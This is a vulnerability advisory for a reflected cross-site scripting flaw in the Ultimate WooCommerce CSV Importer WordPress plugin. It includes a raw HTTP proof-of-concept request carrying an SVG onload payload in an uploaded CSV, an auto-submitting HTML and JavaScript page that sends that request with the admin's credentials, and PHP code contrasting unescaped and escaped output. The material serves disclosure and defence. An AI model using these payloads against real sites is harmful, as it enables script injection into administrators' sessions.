WordPress Plugin Vulnerabilities
Ultimate WooCommerce CSV Importer <= 2.0 - Reflected Cross-Site Scripting
Description
The plugin does not sanitise and escape the imported data before outputting it back in the page, leading to Reflected Cross-Site Scripting.
Proof of Concept
POST /wp-admin/admin.php?page=simple-woocommerce-csv-loader%2Fadmin%2FCSVLoader.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookies: [logged in admin]
Connection: close

------WebKitFormBoundaryYaKY5tnSQ8biGkYB
Content-Disposition: form-data; name="post_type"

product
------WebKitFormBoundaryYaKY5tnSQ8biGkYB
Content-Disposition: form-data; name="separator"

,
------WebKitFormBoundaryYaKY5tnSQ8biGkYB
Content-Disposition: form-data; name="titeled"

on
------WebKitFormBoundaryYaKY5tnSQ8biGkYB
Content-Disposition: form-data; name="hierarchical_multicat"

on
------WebKitFormBoundaryYaKY5tnSQ8biGkYB
Content-Disposition: form-data; name="upload_file"; filename="example_code.csv"
Content-Type: text/csv

Name,Content,Price,Gender,sku,Multi_cat,Thumbnail
Strawberry Short Cake,Delicious Strawberry Cake 18"",80,Bakery,001,Dessert,<svg/onload=alert(/XSS/)>

<html>
  <body>
    <script>
      function submitRequest() {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "https:\/\/example.com\/wp-admin\/admin.php?page=simple-woocommerce-csv-loader%2Fadmin%2FCSVLoader.php", true);
        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-GB,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------292171499811633611081131645549");
        xhr.withCredentials = true;
        var body = "-----------------------------292171499811633611081131645549\r\n" +
          "Content-Disposition: form-data; name=\"post_type\"\r\n" +
          "\r\n" +
          "product\r\n" +
          "-----------------------------292171499811633611081131645549\r\n" +
          "Content-Disposition: form-data; name=\"taxonomy\"\r\n" +
          "\r\n" +
          "product_type\r\n" +
          "-----------------------------292171499811633611081131645549\r\n" +
          "Content-Disposition: form-data; name=\"separator\"\r\n" +
          "\r\n" +
          ",\r\n" +
          "-----------------------------292171499811633611081131645549\r\n" +
          "Content-Disposition: form-data; name=\"titeled\"\r\n" +
          "\r\n" +
          "on\r\n" +
          "-----------------------------292171499811633611081131645549\r\n" +
          "Content-Disposition: form-data; name=\"hierarchical_multicat\"\r\n" +
          "\r\n" +
          "on\r\n" +
          "-----------------------------292171499811633611081131645549\r\n" +
          "Content-Disposition: form-data; name=\"upload_file\"; filename=\"a.csv\"\r\n" +
          "Content-Type: text/csv\r\n" +
          "\r\n" +
          "Name,Content,Price,Gender,sku,Multi_cat,Thumbnail\n" +
          "Strawberry Short Cake,Delicious Strawberry Cake 18\"\",80,Bakery,001,Dessert,\x3csvg/onload=alert(/XSS/)\x3e\n" +
          "\r\n" +
          "-----------------------------292171499811633611081131645549\r\n" +
          "Content-Disposition: form-data; name=\"wc_load_csv\"\r\n" +
          "\r\n" +
          "Load\r\n" +
          "-----------------------------292171499811633611081131645549--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>
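The missing output escaping from the description, shown beside a hardened version. This is an added example, not the plugin's code: the function names and the preview-table rendering are hypothetical, and the CSV is a constructed sample modelled on the proof of concept.

```php
<?php
// Added example: hypothetical import-preview renderer, not the plugin's code.

/** Parse CSV text into rows (simplified: no newlines inside quoted fields). */
function parse_csv_rows(string $csv, string $separator = ','): array
{
    $rows = [];
    foreach (preg_split('/\r\n|\n|\r/', trim($csv)) as $line) {
        if ($line === '') {
            continue;
        }
        $rows[] = str_getcsv($line, $separator, '"', '\\');
    }
    return $rows;
}

/** Vulnerable pattern: cell values are concatenated into HTML as-is. */
function render_preview_unescaped(array $rows): string
{
    $html = "<table>\n";
    foreach ($rows as $row) {
        $html .= '<tr><td>' . implode('</td><td>', $row) . "</td></tr>\n";
    }
    return $html . "</table>\n";
}

/** Hardened pattern: every cell is escaped for the HTML text context. */
function render_preview_escaped(array $rows): string
{
    $html = "<table>\n";
    foreach ($rows as $row) {
        $cells = array_map(
            // Inside WordPress, esc_html() is the idiomatic call here.
            static fn($cell) => htmlspecialchars((string) $cell, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'),
            $row
        );
        $html .= '<tr><td>' . implode('</td><td>', $cells) . "</td></tr>\n";
    }
    return $html . "</table>\n";
}

// Constructed sample modelled on the CSV in the proof of concept.
$csv = "Name,Price,Thumbnail\nStrawberry Short Cake,80,<svg/onload=alert(/XSS/)>\n";
$rows = parse_csv_rows($csv);
echo render_preview_unescaped($rows); // markup from the file reaches the page
echo render_preview_escaped($rows);   // same cell rendered as inert text
```

In the escaped output the Thumbnail cell appears as `&lt;svg/onload=alert(/XSS/)&gt;`, so the browser displays it instead of parsing it as an element.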
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Benachi
Submitter
Benachi
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-06-02
Added
2022-06-02
Last Updated
2023-03-04